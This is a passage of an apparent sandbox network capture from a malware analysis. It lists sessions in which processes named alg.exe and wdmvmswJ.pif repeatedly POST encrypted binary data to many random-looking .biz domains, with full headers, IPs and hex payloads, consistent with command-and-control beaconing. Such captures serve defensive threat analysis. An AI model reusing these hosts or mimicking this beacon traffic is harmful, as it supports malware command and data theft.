                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49764 | 172.234.222.143 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:05.631436110 CET | 355 | OUT | POST /gcfjbafgheaeck HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49765 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:05.661675930 CET | 352 | OUT | POST /uextgbni HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:06.499507904 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=164f5cd5a705e8acd9dec05cac632db7|173.254.250.82|1730445846|1730445846|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.8 | 49766 | 172.234.222.143 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:06.357513905 CET | 350 | OUT | POST /fvthsigvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.8 | 49767 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:06.539400101 CET | 349 | OUT | POST /jftcpo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49768 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:07.073998928 CET | 356 | OUT | POST /jdfcrnyhggjio HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:08.502891064 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=407903f0f946674c159f296360b00f86|173.254.250.82|1730445848|1730445848|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 49769 | 34.246.200.160 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:07.352500916 CET | 350 | OUT | POST /sarbnswr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:07.352538109 CET | 778 | OUT | Data Raw: 49 09 05 8c f4 77 ad fb fe 02 00 00 fc 85 a2 36 48 eb 41 2c 9c d9 0a a2 37 24 eb c9 b8 5a 06 7b 09 67 b3 b3 d2 47 ef 72 f2 e8 f5 66 a2 2e b4 be c0 26 ed e9 c3 68 57 3d 99 ab d5 33 dc d6 e4 c6 f0 ac d0 7d a9 8e 6e 06 da 50 15 1d d0 cc 31 55 56 6e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Iw6HA,7$Z{gGrf.&hW=3}nP1UVn)GmW*Oq/BY^sfw:^YClLdAlA6eK|KkDvQDV_+ KT.<5t`,vLH
Nov 1, 2024 08:24:08.313596010 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3fe9daa3301784027e9d719ac360c0ca|173.254.250.82|1730445848|1730445848|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 49770 | 18.208.156.248 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:08.481409073 CET | 352 | OUT | POST /nhxpdndgorr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:08.481442928 CET | 778 | OUT | Data Raw: 1f 6f c6 5c 7a 6a f0 d0 fe 02 00 00 33 79 a9 c7 8d df d7 06 e8 0d 9a 54 b6 95 e2 88 06 81 a6 61 04 04 f4 c6 20 e8 9b 99 b2 c8 71 16 61 0f a3 37 b2 05 ba 8f a9 cc 85 42 d0 ab 67 67 5a 02 eb de 8b 87 4d f4 a5 14 45 ab d4 90 88 e8 33 d7 a0 15 93 93
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o\zj3yTa qa7BggZME3UKdv[ti99N(di_S@(e=Mn.A$3pzhTO/YUy&/2IShP^3CY%cPdKs[@-|l+`1Jy
Nov 1, 2024 08:24:09.148029089 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b0e71286991e06c9cd3317506d9052ef|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 49771 | 18.208.156.248 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:08.528558969 CET | 345 | OUT | POST /mxlx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:08.528584957 CET | 802 | OUT | Data Raw: 87 d3 33 fb dd b8 14 ea 16 03 00 00 3a 2f 13 ad 8f e7 4f 6e 86 47 e6 b1 53 e1 48 d4 91 93 3e 0f 1a c9 8a ec 4a ca 4d 81 b6 7e 4b c7 7d 91 8d f9 27 a9 ef fb d3 23 ce 8b 1b 22 0d 06 fc 50 22 f3 e6 ff 8b a6 1c c2 35 36 67 42 9a e4 31 50 ac 9c d2 24
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3:/OnGSH>JM~K}'#"P"56gB1P$}z-*c/{dgaQ"^0X"$rnw'gN"$jRo.T$} sTXuF4~!A0U]I/<XXUYUt8/JP+F{`a
Nov 1, 2024 08:24:09.217323065 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5b84c012568663f237b656c2850a3fec|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 49772 | 44.221.84.105 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:09.281198978 CET | 347 | OUT | POST /bss HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:09.281239033 CET | 802 | OUT | Data Raw: 72 6b 04 e1 bf 75 4f 04 16 03 00 00 74 65 bc b9 88 12 1f 16 0b b0 c4 90 ce 01 c0 6b 3a 2f d3 89 98 c6 07 cc 68 b3 47 6c 6a 0d 6e c8 a3 f4 17 67 8e 26 c2 78 6b 6f 4c 1c ea 40 aa 4b 23 4d f4 b2 3a 6a d8 4b d5 a6 7f c6 d2 c5 73 3e ba 7e a9 c5 39 ef
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rkuOtek:/hGljng&xkoL@K#M:jKs>~9q<R3(>67u(Cmi6w>8qwi7f\)rX1A,4]\9WL\=>&o{=+SB4(*v/kX'6.K4A?
Nov 1, 2024 08:24:09.944010019 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b779c41a7e24b48a06f6b4753b8df14d|173.254.250.82|1730445849|1730445849|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 49773 | 208.100.26.245 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:09.329936981 CET | 355 | OUT | POST /hckdbdnsiwd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:09.329952002 CET | 778 | OUT | Data Raw: 2e fe 14 f8 c7 14 6e 4e fe 02 00 00 2d 1f 92 02 49 62 78 36 d0 a9 ae 08 e1 0b f2 23 cf 38 97 81 27 45 97 8e da e5 fc a4 9e 70 4a a6 a7 a9 a7 b8 32 02 cd 2d f9 1f b6 ea 79 d2 82 ce 9f 8c a7 bc a3 b8 ec 95 0c 3b 5b 60 af 59 25 cd fa e1 55 5f 51 17
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .nN-Ibx6#8'EpJ2-y;[`Y%U_Q_#9+v*{Cp@=]$jD?C+-cX;U0AZ%-Dn3Wkd|i^Drt8kzFmv)ScqJ'qYJg
Nov 1, 2024 08:24:09.965711117 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 1, 2024 08:24:10.000356913 CET | 346 | OUT | POST /bh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:10.000401020 CET | 778 | OUT | Data Raw: c1 8f 87 2b 89 bf 9d 36 fe 02 00 00 7d 77 66 f6 bf dd ce 76 14 f3 4b e0 05 cf dd c3 10 9d 40 e8 0c 02 6c ef 91 99 a8 c7 f0 79 18 f5 c1 6f 96 89 8b 46 b8 0a 21 89 39 98 3f 06 32 7e 6c 3a c2 64 e2 c6 17 d4 a8 9c a9 37 20 5c bc 77 f5 7f 89 d5 59 8a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +6}wfvK@lyoF!9?2~l:d7 \wYeMgv<gegjl{]0`=b=d9_Bk1B%Qdw"&&%wYd*;UV!#p{$^xb,Zn\s6(wUK8X&0jja=
Nov 1, 2024 08:24:10.146083117 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 49774 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:10.005709887 CET | 353 | OUT | POST /dtupajxvn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:10.005726099 CET | 802 | OUT | Data Raw: fc 1b 3a d7 bd c4 b5 44 16 03 00 00 95 0e b3 eb d0 05 61 57 18 5d a8 76 6f 71 29 4f 70 47 41 00 ca f8 e8 a7 14 64 47 91 79 9f da 34 cc 23 d3 cd 55 a3 8d 04 99 58 74 bb 41 09 c4 6b 23 0e 22 21 30 68 db f0 76 52 26 f7 c9 43 0b e2 02 8b a1 15 52 47
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :DaW]voq)OpGAdGy4#UXtAk#"!0hvR&CRG|Hpit!-3gDAe1K?-&f`F>Z|[3'QlqqS|vhVY"-1gzxy<Bd;_?@(P6EeAl


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.8 | 49775 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:10.456578970 CET | 358 | OUT | POST /fkcgbfiiatbbgsse HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:10.456615925 CET | 778 | OUT | Data Raw: 82 ae ef d3 64 6a dd e0 fe 02 00 00 68 e2 1d c9 25 63 b0 e2 a7 b3 c0 72 c9 05 96 d8 09 53 e1 df 7f 85 72 16 2c 41 26 5e 04 04 ef ac 2f 72 e7 b5 63 a9 98 03 7e ae eb b0 bc 22 69 e2 1d 54 bb 1c ae cd 83 42 ba 43 dc f3 08 9b b7 33 0c 11 4b e6 dd 5d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: djh%crSr,A&^/rc~"iTBC3K]X*}d\S)O:xWjP08\/HW@L@@4=i#`:U`UKB{qv/->^cx/0_K,^dY^Uyt<E]
Nov 1, 2024 08:24:11.862967968 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=da725ec1ac65e5bac18ddcee66ed9243|173.254.250.82|1730445851|1730445851|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 49777 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:11.093044043 CET | 353 | OUT | POST /lfobofpdm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
